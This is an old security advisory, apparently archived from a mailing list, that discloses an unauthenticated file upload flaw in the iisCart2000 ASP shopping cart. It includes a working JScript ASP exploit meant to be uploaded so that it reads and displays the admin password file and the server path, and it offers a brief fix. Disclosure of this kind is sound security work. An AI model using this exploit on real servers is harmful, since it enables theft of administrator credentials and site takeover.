1ndonesian Security Team (1st)
http://bosen.net/releases/
=======================================================================
=======================
Security Advisory
Advisory Name: iisCart2000 Administration Security Leak
Release Date: 05/10/2003
Application: Latest
Platform: Win32
Severity: High/Remote
BUG Type: Security Leak
Author: Bosen <mobile@bosen.net>
Discover by: Bosen <mobile@bosen.net>
Vendor Status: Notified, see response below.
Vendor URL: http://www.iiscart.com
Reference: http://bosen.net/releases/
Overview:
iisCART2000 is a next generation ASP component based Ecommerce
solution.
With over 150 methods and properties, iisCART2000 puts significant new
features
in the hands of ASP web masters and developers. Building on 2 years of
development,
iisCART2000 incorporates clients suggestions as well as many ground
breaking developer
contributions.
iisCART2000 adds browser based file upload functionality.
This new feature allows you to upload images at the same time you are
adding data
to the items table in your database without having to use FTP or
FrontPage.
iisCART2000 even fills in the image path information for subsequent
dynamic display.
Unfortunetly this browser based file upload has a leak. Which is couse
an attacker
can upload any type of file including .asp into web server.
Details:
iiCART2k comes with 2 type. The advance and the basic version.
In the advance version vulnerability lies on /admin/upload.asp, and in
the basic version
lies on /upload.asp. Both of the script does not check priviledge. And
they all unprotected.
These will couse any attacker upload thei malicious
file/script/programs/ into server.
Not just that, beside you can upload it via your own form. The
iisCART2K it self provide
both /admin/upload.htm and /upload.htm that makes attacker would be
more easier to do they job.
And again since the file extention is .htm, it doesnt check any
privilegde permission also.
Exploits:
These is a little demonstration how to get some information including
admin login
and passwd and also database information.
iisCart2k-nice.asp
---START---
// 1ndonesian Security Team
// http://bosen.net/releases/
//
<% @ Language = JScript %>
<%
function WinPath(absPath) {this.absolutePath = absPath;}
function getAbsPath() {return this.absolutePath;}
WinPath.prototype.getAbsolutePath = getAbsPath;
function fileRead(file) {
var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = ""
var tmp = file, f, g = FSO.GetFile(tmp);
f = FSO.OpenTextFile(tmp, 1, false);
strOut = "<PRE STYLE=\"font-size:9pt;\">";
strOut+= Server.HTMLEncode(f.ReadAll());
strOut+= "</PRE>";
f.Close();
return(strOut);
}
var a = new WinPath(Server.Mappath("/"));
var curDir = a.getAbsolutePath();
// You can change these
var admin = curDir + "\\advanced\\admin\\pswd.asp";
with (Response) {
Write("<b>ServerRoot : "+curDir+"<br></b>");
Write("<b>Admin Info : "+admin+"<br><br></b>");
Write(fileRead(admin));
}
%>
---END--
Upload this file, and browse it. It will shows you current
configurations file.
You may change the admin path, and db path, depend on target URL.
Vendor Response:
No Response
Recommendation:
a. Put these code in top of the line of upload.asp
<!--#include file="pswd.asp" -->
1ndonesian Security Team (1st) Advisory:
http://bosen.net/releases/
About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced
application
security assessment. Based in Indonesia, 1ndonesian Security Team
offers best of
breed security consulting services, specialising in application, host
and network
security assessments.
1st provides security information and patches for use by the entire 1st
community.
This information is provided freely to all interested parties and may
be
redistributed provided that it is not altered in any way, 1st is
appropriately
credited and the document retains.
Greetz to:
AresU, TioEuy, sakitjiwa, syzwz,
and all 1ndonesian Security Team
Bosen <mobile@bosen.net>
======================
Original document can be fount at http://bosen.net/releases/?id=31
-----------------------------------------------
This mail sent through http://webmail.bosen.net
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
